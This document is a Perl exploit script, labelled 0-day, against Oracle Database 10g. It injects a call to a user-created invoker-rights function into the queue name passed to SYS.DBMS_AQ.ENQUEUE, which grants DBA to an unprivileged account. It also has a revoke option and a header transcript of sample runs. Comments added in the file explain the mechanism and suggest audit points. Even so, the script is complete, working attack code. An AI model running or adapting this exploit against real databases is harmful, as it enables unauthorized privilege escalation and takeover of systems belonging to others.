Oracle 10g DBMS_AQ.ENQUEUE SQL Injection Exploit



#!/usr/bin/perl
#
# [0-day] Remote Oracle DBMS_AQ.ENQUEUE exploit (10g)
#
# Grant or revoke dba permission to unprivileged user
# 
# Tested on \"Oracle Database 10g Enterprise Edition Release 10.1.0.3.0\"
#   
#   AUTHOR: Andrea \"bunker\" Purificato
#           http://rawlab.mindcreations.com
#
#   DATE:   Copyright 2007 - Mon Apr  2 11:54:22 CEST 2007
#  
#   PATCH:  http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2007.html 
#	    (CVE-2007-0268 ?)
#
#
# Oracle InstantClient (basic + sdk) required for DBD::Oracle
# 
#
# bunker@fin:~/orasploit$ perl dbms_aq-enqueue.pl -h localhost -s test -u bunker -p **** -r
#  [-] Wait...
#  [-] Revoking DBA from BUNKER...
#  DBD::Oracle::db do failed: ORA-01951: ROLE \'DBA\' not granted to \'BUNKER\' (DBD ERROR: OCIStmtExecute) [for Statement \"REVOKE DBA FROM BUNKER\"] at dbms_aq-enqueue.pl line 95.
#  [-] Done!
# 
# bunker@fin:~/orasploit$ perl dbms_aq-enqueue.pl -h localhost -s test -u bunker -p **** -g
#  [-] Wait...
#  [-] Creating evil function...
#  [-] Go ...(don\'t worry about errors)!
#  DBD::Oracle::st execute failed: ORA-25205: the QUEUE BUNKER.\'burp\' does not exist
#  ORA-06512: at \"SYS.DBMS_AQ\", line 6
#  ORA-06512: at \"SYS.DBMS_AQ\", line 215
#  ORA-06512: at line 10 (DBD ERROR: OCIStmtExecute) [for Statement \"
#  DECLARE
#      ident   VARCHAR2(100);
#      enq_opt dbms_aq.enqueue_options_t;
#      msg_prp dbms_aq.message_properties_t;
#      msgid   raw(100);
#      payload raw(100);
#  BEGIN
#      ident := \'\"\'\'\'||BUNKER.own||\'\'\'\"\';
#      dbms_aq.enqueue(ident, enq_opt,msg_prp, payload, msgid);
#  END;
#  \"] at dbms_aq-enqueue.pl line 125.
#  [-] YOU GOT THE POWAH!!
# 
# bunker@fin:~/orasploit$ perl dbms_aq-enqueue.pl -h localhost -s test -u bunker -p **** -r
#  [-] Wait...
#  [-] Revoking DBA from BUNKER...
#  [-] Done!
#

use warnings;
use strict;
use DBI;
use Getopt::Std;
use vars qw/ %opt /;

# Print the command-line synopsis to STDOUT and terminate.
# Called when a required option (-h/-s/-u/-p) is missing or when
# neither -g nor -r is given; it ignores @_, so the bare `&usage`
# calls below (which pass the caller's @_ through) are harmless.
sub usage {
&nbsp;&nbsp;&nbsp;&nbsp;print&nbsp;<<\"USAGE\";
&nbsp;&nbsp;&nbsp;&nbsp;
Syntax:&nbsp;$0&nbsp;-h&nbsp;<host>&nbsp;-s&nbsp;<sid>&nbsp;-u&nbsp;<user>&nbsp;-p&nbsp;<passwd>&nbsp;-g|-r&nbsp;[-P&nbsp;<port>]

Options:
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;-h&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<host>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;target&nbsp;server&nbsp;address
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;-s&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<sid>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;target&nbsp;sid&nbsp;name
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;-u&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<user>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;user
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;-p&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<passwd>&nbsp;&nbsp;&nbsp;password&nbsp;

&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;-g|-r&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;(g)rant&nbsp;dba&nbsp;to&nbsp;user&nbsp;|&nbsp;(r)evoke&nbsp;dba&nbsp;from&nbsp;user
&nbsp;&nbsp;&nbsp;&nbsp;[-P&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<port>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Oracle&nbsp;port]

USAGE
    # Exit status is 0 even when triggered by a usage error, so a
    # wrapping shell script cannot tell "help" from "bad arguments".
&nbsp;&nbsp;&nbsp;&nbsp;exit&nbsp;0
}

# Option parsing. -h/-s/-u/-p are mandatory, exactly one of -g/-r
# selects the action, -P optionally overrides the listener port.
# `&usage` without parens is legacy call syntax (perlcritic flags it);
# it works here only because usage() never reads its arguments.
my&nbsp;$opt_string&nbsp;=&nbsp;\'h:s:u:p:grP:\';
getopts($opt_string,&nbsp;\\%opt)&nbsp;or&nbsp;&usage;
&usage&nbsp;if&nbsp;(&nbsp;!$opt{h}&nbsp;or&nbsp;!$opt{s}&nbsp;or&nbsp;!$opt{u}&nbsp;or&nbsp;!$opt{p}&nbsp;);
&usage&nbsp;if&nbsp;(&nbsp;!$opt{g}&nbsp;and&nbsp;!$opt{r}&nbsp;);
# Upper-cased to match Oracle's default identifier folding. $user is
# interpolated unquoted into the GRANT/REVOKE strings and into the
# PL/SQL block below; nothing validates that it is a plain identifier.
my&nbsp;$user&nbsp;=&nbsp;uc&nbsp;$opt{u};

# DSN is assembled from the CLI values. No RaiseError/PrintError
# attributes are passed, so DBI's defaults apply (PrintError on,
# RaiseError off): every later do()/execute() failure is only a
# warning, which is why the transcript in the header shows ORA-
# errors followed by "Done!" / "POWAH". `or die` without a message
# also drops $DBI::errstr from the fatal output.
my&nbsp;$dbh&nbsp;=&nbsp;undef;
if&nbsp;($opt{P})&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;$dbh&nbsp;=&nbsp;DBI->connect(\"dbi:Oracle:host=$opt{h};sid=$opt{s};port=$opt{P}\",&nbsp;$opt{u},&nbsp;$opt{p})&nbsp;or&nbsp;die;
}&nbsp;else&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;$dbh&nbsp;=&nbsp;DBI->connect(\"dbi:Oracle:host=$opt{h};sid=$opt{s}\",&nbsp;$opt{u},&nbsp;$opt{p})&nbsp;or&nbsp;die;
}

# Statement that the OWN function below runs via EXECUTE IMMEDIATE.
# From a monitoring standpoint this GRANT, issued on behalf of a
# non-DBA account, is the event worth alerting on.
my&nbsp;$sqlcmd&nbsp;=&nbsp;\"GRANT&nbsp;ALL&nbsp;PRIVILEGE,&nbsp;DBA&nbsp;TO&nbsp;$user\";
print&nbsp;\"[-]&nbsp;Wait...
\";

# -r path: a plain REVOKE executed as the connected user. It can only
# succeed if that user already holds DBA (ORA-01951 otherwise, see the
# header transcript). The REVOKE is not wrapped in the function trick,
# so it relies on privileges obtained by an earlier -g run.
if&nbsp;($opt{r})&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;print&nbsp;\"[-]&nbsp;Revoking&nbsp;DBA&nbsp;from&nbsp;$user...
\";
&nbsp;&nbsp;&nbsp;&nbsp;$sqlcmd&nbsp;=&nbsp;\"REVOKE&nbsp;DBA&nbsp;FROM&nbsp;$user\";
&nbsp;&nbsp;&nbsp;&nbsp;$dbh->do(&nbsp;$sqlcmd&nbsp;);
&nbsp;&nbsp;&nbsp;&nbsp;print&nbsp;\"[-]&nbsp;Done!
\";
&nbsp;&nbsp;&nbsp;&nbsp;$dbh->disconnect;
&nbsp;&nbsp;&nbsp;&nbsp;exit;
}

# -g path, step 1: create a function in the connected user's schema
# with invoker rights (AUTHID CURRENT_USER) and an autonomous
# transaction, so the COMMIT inside it is independent of the caller's
# transaction. EXECUTE IMMEDIATE runs $sqlcmd with the privileges of
# whoever ends up invoking OWN. Defensive note: CREATE FUNCTION with
# AUTONOMOUS_TRANSACTION plus EXECUTE IMMEDIATE 'GRANT ...' from a
# non-DBA account is a good audit-policy candidate.
print&nbsp;\"[-]&nbsp;Creating&nbsp;evil&nbsp;function...
\";
$dbh->do(&nbsp;qq{
CREATE&nbsp;OR&nbsp;REPLACE&nbsp;FUNCTION&nbsp;OWN&nbsp;RETURN&nbsp;VARCHAR&nbsp;
&nbsp;AUTHID&nbsp;CURRENT_USER&nbsp;AS&nbsp;
&nbsp;PRAGMA&nbsp;AUTONOMOUS_TRANSACTION;&nbsp;
BEGIN
&nbsp;EXECUTE&nbsp;IMMEDIATE&nbsp;\'$sqlcmd\';&nbsp;COMMIT;&nbsp;
&nbsp;RETURN&nbsp;\'burp\';
END;
}&nbsp;);
&nbsp;
# -g path, step 2: the queue-name argument handed to SYS.DBMS_AQ.ENQUEUE
# is built so that it contains a reference to $user.OWN. Presumably the
# unpatched package evaluates that name in a privileged context, which
# is what causes the GRANT to run; the CPU Jan 2007 patch referenced in
# the header is the fix. ORA-25205 ("queue does not exist") afterwards
# is expected and is what the "don't worry about errors" message means.
print&nbsp;\"[-]&nbsp;Go&nbsp;...(don\'t&nbsp;worry&nbsp;about&nbsp;errors)!
\";
my&nbsp;$sth&nbsp;=&nbsp;$dbh->prepare(&nbsp;qq{
DECLARE
&nbsp;&nbsp;&nbsp;&nbsp;ident&nbsp;&nbsp;&nbsp;VARCHAR2(100);
&nbsp;&nbsp;&nbsp;&nbsp;enq_opt&nbsp;dbms_aq.enqueue_options_t;
&nbsp;&nbsp;&nbsp;&nbsp;msg_prp&nbsp;dbms_aq.message_properties_t;
&nbsp;&nbsp;&nbsp;&nbsp;msgid&nbsp;&nbsp;&nbsp;raw(100);
&nbsp;&nbsp;&nbsp;&nbsp;payload&nbsp;raw(100);
BEGIN
&nbsp;&nbsp;&nbsp;&nbsp;ident&nbsp;:=&nbsp;\'\"\'\'\'||$user.own||\'\'\'\"\';
&nbsp;&nbsp;&nbsp;&nbsp;dbms_aq.enqueue(ident,&nbsp;enq_opt,msg_prp,&nbsp;payload,&nbsp;msgid);&nbsp;
END;
});
# Return values of execute/finish/disconnect are ignored; with
# PrintError on, a failure surfaces only as a warning, so the success
# banner below is printed unconditionally and proves nothing. The OWN
# function is also never dropped, leaving an artifact in the schema
# that a post-incident review can look for.
$sth->execute;
$sth->finish;
print&nbsp;\"[-]&nbsp;YOU&nbsp;GOT&nbsp;THE&nbsp;POWAH!!
\";
$dbh->disconnect;
exit;
